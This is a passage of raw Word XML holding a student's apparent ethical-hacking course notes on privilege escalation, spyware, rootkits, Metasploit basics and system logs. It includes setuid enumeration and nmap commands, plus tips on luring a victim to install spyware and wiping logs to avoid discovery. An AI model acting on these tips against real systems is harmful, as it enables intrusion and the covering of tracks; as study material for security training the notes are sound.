        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- possible to switch to root using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t>prompt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> means you're </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t xml:space="preserve">entering commands at </w:t>
      </w:r>
      <w:r>
        <w:t>root level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>programs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> require </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t>administrator’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> level </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run. These have a bit set to allow a switch user in the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> find / -type f -perm +6000 -ls</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- finds all files on system with this bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- requires a dialog box requires a log in. No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has just about the highest level </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in Windows. Try and highjack one of these Services for </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>privileges</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D5353D">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>- Same as Windows</w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Spyware, rootkits, key loggers...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00D5353D" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Spyware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>is a type of software that installs on your systems and harvests information from users. Takes advantage of vulnerabilities on system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolWebSearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - Classic example. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Huntbar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is another example. These pieces of software can download additional software or even exec</w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t>ute commands in the background unbeknown to the user.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5353D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - displays adverts while your program is running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As an ethical hacker </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> might need to make use social engineering to direct somebody to my website where </w:t>
      </w:r>
      <w:r w:rsidR="00D5353D">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> install spyware on their PC in an attempt at information gathering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Key stroke logger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - comes in both software and hardware. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Hardware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> needs to be placed and recovered. Software version could have a dial home function. Looks for passwords or credit card information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rootkit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - used to try and hide other pieces of malware on a system. It can totally replace and then hide processes belonging to malware on the system so that you can't see them running. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00D5353D" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In Windows</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> an example would be that a rootkit would replace Explorer on a system </w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> works identically to Explorer except it didn't </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> the files belonging to the malware. Same with using an "ls" in Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Really fine line in the use of these tools as an ethical hacker. If you do use make sure you don't lose control of them!! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anti-rootkit utility </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TDSSKiller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D5353D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>rootkit hunter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are 2 software pieces that go hunting for rootkits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Pen</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit framework. Makes the job much easier by allowing you to group together already written exploits to speed up the </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>pen test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00795875">
        <w:t>Allows you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to write exploits against systems</w:t>
      </w:r>
      <w:r w:rsidR="00795875">
        <w:t xml:space="preserve"> easily</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Used to be a CLI but now has a lovely GUI or web</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Create a project. Launch a scan (type of nmap scan). Easily click through the results. Tab displays the known vulnerabilities for the scanned host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the scan is done Metasploit tries to work out if there are any known exploits. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Uses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nexpose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nessus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scans.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modules and take a look at the different types of exploits that are available. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Auditing and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Most modern systems will send logs. Ne</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d to know as an ethical hacker that most activities will report back by sending a log. Need to know where </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> store their logs so that they can be wiped clean. Also that you might get discovered. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/log</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is where variable data is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/syslog</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- interesting file for an attacker</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- info about authentication and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> messages</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dmsg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- shows all messages that the kernel has </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>thrown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> out</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Console GUI. Navigate through most of the same files as in Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Diagnostic and usage messages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>User Diagnostic Reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00D12C69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Event viewer. Navigate to Windows Logs. Another GUI to display the files saved in logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Application, Security, Setup, Forwarded Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>All systems that have logging capabilities also have auditing capabilities. In Windows it's easy to find in Computer Management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Using Metasploit in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- to enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MetaSploitFramework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> console </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -0 -T 4 192.168.1.245</w:t>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- show hosts results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>badXP.nessus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D12C69">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- table to show what vulnerabilities </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>serach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D12C69">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ms08_067</w:t>
      </w:r>
      <w:r>
